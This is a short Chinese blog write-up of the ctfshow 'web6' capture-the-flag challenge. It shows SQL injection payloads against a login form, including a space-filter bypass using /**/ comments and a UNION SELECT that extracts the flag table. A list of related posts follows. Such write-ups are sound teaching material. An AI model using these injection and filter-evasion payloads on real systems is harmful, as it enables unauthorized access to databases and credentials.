ctfshow-web6

Wcbddd2023-08-07 16:02

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码 
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码 
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
持敬chijing4 小时前
Web渗透之前后端漏洞-XSS漏洞原理攻击防御全流程
前端·安全·web安全·网络安全·网络攻击模型·安全威胁分析·xss
持敬chijing4 小时前
Web渗透之SQL注入总结
sql·安全·web安全·网络安全·网络攻击模型·web
juesdo7 小时前
青岑CTF之 EZPHP系列
笔记·web安全·php
Par@ish7 小时前
关于开源GNU通用许可(GPLv3)详细解说
web安全·开源·开源协议
Lust Dusk8 小时前
postman工具介绍(附下载教程)
测试工具·安全·web安全·postman
上海云盾第一敬业销售8 小时前
WAF架构解析与实战经验分享
网络协议·web安全·架构
持敬chijing8 小时前
Web渗透之SQL注入-SQLMAP使用笔记
数据库·sql·安全·web安全·网络安全·网络攻击模型
Chengbei119 小时前
CTF & 红队专用 AI 求解AI 引擎 Cairn 系统,化轻量化部署,红队、CTF、漏洞研究一站式解决方案
java·人工智能·安全·web安全·网络安全·系统安全
terry6009 小时前
2026携号转网查询接口深度测评:技术指标、接入教程与服务商选型
大数据·人工智能·web安全·信息与通信·数据库架构
爱讲故事的10 小时前
计算机网络第 8 章复习:Network Security 网络安全
网络·计算机网络·web安全
热门推荐
01《置身钉内》原文-可播放阅读02【AI】2026 年具身智能模型和世界模型总结03GitHub 镜像站点04Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06Codex 下载安装指南:Windows 和 macOS 官方版下载072026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf08AI科技热点日报 | 2026年6月1日09【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法10CC-Switch 下载、安装与使用配置指南【2026.5.29】